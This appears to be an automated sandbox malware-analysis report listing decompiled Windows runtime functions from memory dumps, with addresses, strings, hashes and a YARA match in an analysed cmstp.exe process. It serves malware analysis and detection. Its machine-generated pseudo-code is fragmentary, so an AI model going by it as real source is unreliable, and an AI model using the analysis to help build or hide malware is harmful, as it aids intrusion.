				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xb92088; // 0x757c166b
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00AE7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00AF13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00AE7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00AE7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00AB2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00ABE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                              0x00af14c0
                                                              0x00af14cb
                                                              0x00af14d2
                                                              0x00af14d6
                                                              0x00af14da
                                                              0x00af14de
                                                              0x00af14e3
                                                              0x00af157a
                                                              0x00af157a
                                                              0x00af14f1
                                                              0x00af14f3
                                                              0x00b1ea0f
                                                              0x00000000
                                                              0x00b1ea15
                                                              0x00000000
                                                              0x00b1ea15
                                                              0x00af14f9
                                                              0x00af14f9
                                                              0x00af14fe
                                                              0x00af1504
                                                              0x00b1ea1a
                                                              0x00b1ea1f
                                                              0x00b1ea21
                                                              0x00b1ea22
                                                              0x00b1ea27
                                                              0x00b1ea2a
                                                              0x00b1ea2a
                                                              0x00af1515
                                                              0x00af1517
                                                              0x00af156d
                                                              0x00af1572
                                                              0x00af1575
                                                              0x00af1575
                                                              0x00af151e
                                                              0x00b1ea50
                                                              0x00b1ea55
                                                              0x00b1ea58
                                                              0x00b1ea58
                                                              0x00af152e
                                                              0x00af1531
                                                              0x00af1533
                                                              0x00000000
                                                              0x00af1535
                                                              0x00af1541
                                                              0x00af1549
                                                              0x00af1549
                                                              0x00af1533
                                                              0x00af14f3
                                                              0x00af1559

                                                              APIs
                                                              • ___swprintf_l.LIBCMT ref: 00B1EA22
                                                                • Part of subcall function 00AF13CB: ___swprintf_l.LIBCMT ref: 00AF146B
                                                                • Part of subcall function 00AF13CB: ___swprintf_l.LIBCMT ref: 00AF1490
                                                              • ___swprintf_l.LIBCMT ref: 00AF156D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 8e56ee01cb4204ebe65d36f6a96ce0d07335b03f75e75d3483e97f563eb5173d
                                                              • Instruction ID: 52efd574ec27ec1ea4775b7fe8d353fff2760826ade8cbea930b06a04edf8833
                                                              • Opcode Fuzzy Hash: 8e56ee01cb4204ebe65d36f6a96ce0d07335b03f75e75d3483e97f563eb5173d
                                                              • Instruction Fuzzy Hash: 2F21AE7290021DEBCB20DFA8CD41AFE73BCAB50700F444556FE46E3141DB70AA588BE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AD53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 45%
                                                              			E00AD53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00b901c0;
									_push(_t92);
									_push(0);
									_t37 = E00AAF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00AF4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00B03F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00B03F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00B3217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00B03F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00AF3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00AD5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E00AAF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00AF3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E00AAF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00AF3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E00AAF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00AF3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00AD5329(_t74, _t92);
													_push(1);
													_t48 = E00AD53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                              0x00ad53ab
                                                              0x00ad53ae
                                                              0x00ad53b1
                                                              0x00ad53b4
                                                              0x00ad53b7
                                                              0x00af05b6
                                                              0x00af05c0
                                                              0x00af05c3
                                                              0x00000000
                                                              0x00af05c9
                                                              0x00af05c9
                                                              0x00af05cc
                                                              0x00af05d5
                                                              0x00af05d5
                                                              0x00ad53bd
                                                              0x00ad53bd
                                                              0x00ad53bd
                                                              0x00ad53be
                                                              0x00ad53be
                                                              0x00ad53be
                                                              0x00ad53c0
                                                              0x00000000
                                                              0x00000000
                                                              0x00b12269
                                                              0x00b1226d
                                                              0x00b12349
                                                              0x00b1234d
                                                              0x00b12273
                                                              0x00b12276
                                                              0x00b12279
                                                              0x00b1227e
                                                              0x00b12283
                                                              0x00b12287
                                                              0x00b1228a
                                                              0x00b1228d
                                                              0x00b1228f
                                                              0x00b122bc
                                                              0x00b122bc
                                                              0x00b122bc
                                                              0x00b122be
                                                              0x00b122c4
                                                              0x00b122cc
                                                              0x00b122d0
                                                              0x00b122d6
                                                              0x00b122d7
                                                              0x00b122da
                                                              0x00b122df
                                                              0x00b122e4
                                                              0x00000000
                                                              0x00000000
                                                              0x00b122e6
                                                              0x00b122e9
                                                              0x00b122f4
                                                              0x00b122f9
                                                              0x00b122fa
                                                              0x00b12305
                                                              0x00b12314
                                                              0x00b12319
                                                              0x00b1231a
                                                              0x00b1231d
                                                              0x00b12320
                                                              0x00b12323
                                                              0x00b12323
                                                              0x00b12328
                                                              0x00b1232d
                                                              0x00b1232f
                                                              0x00b12331
                                                              0x00b12336
                                                              0x00b12336
                                                              0x00b1233b
                                                              0x00b1233d
                                                              0x00b12350
                                                              0x00b12351
                                                              0x00b12356
                                                              0x00b12359
                                                              0x00b12359
                                                              0x00b1235b
                                                              0x00b1235d
                                                              0x00ad5367
                                                              0x00ad536b
                                                              0x00ad5372
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b12363
                                                              0x00b12363
                                                              0x00b12369
                                                              0x00b1236a
                                                              0x00b1236c
                                                              0x00b12371
                                                              0x00b12373
                                                              0x00000000
                                                              0x00b12379
                                                              0x00b12379
                                                              0x00b1237a
                                                              0x00b1237f
                                                              0x00b1237f
                                                              0x00b12385
                                                              0x00b12386
                                                              0x00b12389
                                                              0x00b1238e
                                                              0x00b12390
                                                              0x00ad5378
                                                              0x00ad537c
                                                              0x00b12396
                                                              0x00b12396
                                                              0x00b12397
                                                              0x00b1239c
                                                              0x00b123a2
                                                              0x00b123a3
                                                              0x00b123a6
                                                              0x00b123ab
                                                              0x00b123ad
                                                              0x00000000
                                                              0x00b123b3
                                                              0x00b123b3
                                                              0x00b123b4
                                                              0x00b123b9
                                                              0x00b123ba
                                                              0x00b123ba
                                                              0x00b123bc
                                                              0x00b123bf
                                                              0x00000000
                                                              0x00000000
                                                              0x00b09153
                                                              0x00b09158
                                                              0x00b0915a
                                                              0x00b0915e
                                                              0x00b09160
                                                              0x00000000
                                                              0x00b09166
                                                              0x00b09166
                                                              0x00b09171
                                                              0x00b09176
                                                              0x00b09176
                                                              0x00000000
                                                              0x00b09160
                                                              0x00b123c6
                                                              0x00b123cb
                                                              0x00b123ce
                                                              0x00b123d7
                                                              0x00b123d7
                                                              0x00b123ad
                                                              0x00b12390
                                                              0x00b12373
                                                              0x00b1233f
                                                              0x00b1233f
                                                              0x00000000
                                                              0x00b1233f
                                                              0x00b12291
                                                              0x00b12291
                                                              0x00b12293
                                                              0x00b12295
                                                              0x00b1229a
                                                              0x00b122a1
                                                              0x00b122a3
                                                              0x00b122a7
                                                              0x00b122a9
                                                              0x00000000
                                                              0x00000000
                                                              0x00b122ab
                                                              0x00b122ad
                                                              0x00b122af
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b122af
                                                              0x00b122b1
                                                              0x00b122b4
                                                              0x00b122b4
                                                              0x00b122b6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b122b6
                                                              0x00b1228f
                                                              0x00000000
                                                              0x00b1226d
                                                              0x00ad53cb
                                                              0x00ad53ce
                                                              0x00ad53d0
                                                              0x00ad53d4
                                                              0x00ad53d6
                                                              0x00000000
                                                              0x00ad53d8
                                                              0x00ad53e3
                                                              0x00ad53ea
                                                              0x00ad53ea
                                                              0x00ad53d6
                                                              0x00000000

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B122F4
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 00B1230B
                                                              • RTL: Re-Waiting, xrefs: 00B12328
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00B122FC
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-871070163
                                                              • Opcode ID: 1f1eb6abae2b42ed6f36e3ad08dc7165740d6bab56c4366a45126e5b7fbe142f
                                                              • Instruction ID: 0c088ed71baa2315096a69d48370f828c8732b4ddcd5c577002bc8e57c1d20db
                                                              • Opcode Fuzzy Hash: 1f1eb6abae2b42ed6f36e3ad08dc7165740d6bab56c4366a45126e5b7fbe142f
                                                              • Instruction Fuzzy Hash: 2D512671A006056BDF159B78CC91FE673E8EF58360F10466AFD19DB282EA71ED8187A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ADEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 51%
                                                              			E00ADEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00ACDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xb9793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00AB16C0(_t39);
				} else {
					_t40 = E00AAF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00AF3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00AB01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xb9793c; // 0x0
								_push(_t85);
								_t44 = E00AB1F28(_t71);
							} else {
								_t44 = E00AAF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00AF3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00B32306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00ADEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00AF4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00B03F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00B03F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xb920c0;
								if(_t85 != 0xb920c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00B3217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00B03F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                              0x00adec56
                                                              0x00adec56
                                                              0x00adec56
                                                              0x00adec5c
                                                              0x00adec64
                                                              0x00b123e6
                                                              0x00b123eb
                                                              0x00b123eb
                                                              0x00adec6a
                                                              0x00adec6c
                                                              0x00adec6f
                                                              0x00b123f3
                                                              0x00b123f8
                                                              0x00b123fa
                                                              0x00b123fc
                                                              0x00adec75
                                                              0x00adec76
                                                              0x00adec76
                                                              0x00adec7b
                                                              0x00adec7c
                                                              0x00adec7e
                                                              0x00b12406
                                                              0x00b12407
                                                              0x00b1240c
                                                              0x00b1240d
                                                              0x00b1240d
                                                              0x00b1240d
                                                              0x00b12414
                                                              0x00b12417
                                                              0x00b1241e
                                                              0x00b12435
                                                              0x00b12438
                                                              0x00b1243c
                                                              0x00b1243f
                                                              0x00b12442
                                                              0x00b12443
                                                              0x00b12446
                                                              0x00b12449
                                                              0x00b12453
                                                              0x00b12455
                                                              0x00b1245b
                                                              0x00b1245b
                                                              0x00adeb99
                                                              0x00adeb99
                                                              0x00adeb9c
                                                              0x00adeb9d
                                                              0x00adeb9f
                                                              0x00adeba2
                                                              0x00b12465
                                                              0x00b1246b
                                                              0x00b1246d
                                                              0x00adeba8
                                                              0x00adeba9
                                                              0x00adeba9
                                                              0x00adebae
                                                              0x00adebb3
                                                              0x00adebb9
                                                              0x00adebbb
                                                              0x00b12513
                                                              0x00b12514
                                                              0x00b12519
                                                              0x00b1251b
                                                              0x00adec2a
                                                              0x00adec2d
                                                              0x00adec33
                                                              0x00adec36
                                                              0x00adec3a
                                                              0x00adec3e
                                                              0x00adec40
                                                              0x00adec47
                                                              0x00adec47
                                                              0x00adec40
                                                              0x00ab22c6
                                                              0x00adebc1
                                                              0x00adebc1
                                                              0x00adebc5
                                                              0x00adec9a
                                                              0x00adec9a
                                                              0x00adebd6
                                                              0x00adebd6
                                                              0x00000000
                                                              0x00adebbb
                                                              0x00b12477
                                                              0x00b1247c
                                                              0x00b12486
                                                              0x00b1248b
                                                              0x00b12496
                                                              0x00b1249b
                                                              0x00b1249d
                                                              0x00b124a0
                                                              0x00b124a3
                                                              0x00b124aa
                                                              0x00b124aa
                                                              0x00b124a5
                                                              0x00b124a5
                                                              0x00b124a5
                                                              0x00b124ac
                                                              0x00b124af
                                                              0x00b124b0
                                                              0x00b124b3
                                                              0x00b124b9
                                                              0x00b124ba
                                                              0x00b124bb
                                                              0x00b124c6
                                                              0x00b124cb
                                                              0x00b124cd
                                                              0x00b124d0
                                                              0x00b124d1
                                                              0x00b124d4
                                                              0x00b124d6
                                                              0x00b124d9
                                                              0x00b124d9
                                                              0x00b124dc
                                                              0x00b124df
                                                              0x00b124e1
                                                              0x00b124e7
                                                              0x00b124e9
                                                              0x00b124ec
                                                              0x00b124ef
                                                              0x00b124f2
                                                              0x00b124f2
                                                              0x00b124ef
                                                              0x00b124e7
                                                              0x00b124fa
                                                              0x00b124ff
                                                              0x00b12501
                                                              0x00b12503
                                                              0x00b12506
                                                              0x00b1250b
                                                              0x00adeb8c
                                                              0x00adeb93
                                                              0x00000000
                                                              0x00000000
                                                              0x00adeb93
                                                              0x00000000
                                                              0x00adeb99
                                                              0x00adec85
                                                              0x00adec85
                                                              0x00adec85
                                                              0x00000000

                                                              Strings
                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00B1248D
                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00B124BD
                                                              • RTL: Re-Waiting, xrefs: 00B124FA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                              • API String ID: 0-3177188983
                                                              • Opcode ID: 88bf27d674288fc6d74e99178840004eae67b8f53cef65298c9b5f453d1fb3d2
                                                              • Instruction ID: d148e507b3be665c11ca448b72945eca827756dc7ee8b692b5fbd9704d7fddb2
                                                              • Opcode Fuzzy Hash: 88bf27d674288fc6d74e99178840004eae67b8f53cef65298c9b5f453d1fb3d2
                                                              • Instruction Fuzzy Hash: A841F670A00204BFDB24EB68DD95FAA77F8EF44720F208656F6559B3C2D734E95187A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AEFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID:
                                                              • API String ID: 3965848254-0
                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction ID: 777fd42ee5b0811ec947c9681e66b65ffbe8e4bed0dc1b14147b083cc4ed0691
                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                              • Instruction Fuzzy Hash: 6A917171D0028AEFDF28DF9AC8456EEBBB4FF55304F64847AD811A7152E7309A81CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Analysis Process: cmstp.exe PID: 2580 Parent PID: 1764 cmstp.exeCOMMON

                                                              Executed Functions

                                                              Function 000A85CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,000A3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000A861D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID: .z`
                                                              • API String ID: 823142352-1441809116
                                                              • Opcode ID: 3bc0459ea3f62a27a632d6c68c242fceca15017a8104a3b30895f9d12cc57ff2
                                                              • Instruction ID: 044858088615c11ce25331d4fffce68150ba9ae7e48648f7b2df4ac7709305fa
                                                              • Opcode Fuzzy Hash: 3bc0459ea3f62a27a632d6c68c242fceca15017a8104a3b30895f9d12cc57ff2
                                                              • Instruction Fuzzy Hash: 6C01B6B2200109AFCB18CF98DC94EEB37A9AF8C354F158248FA5D97281C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A85D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
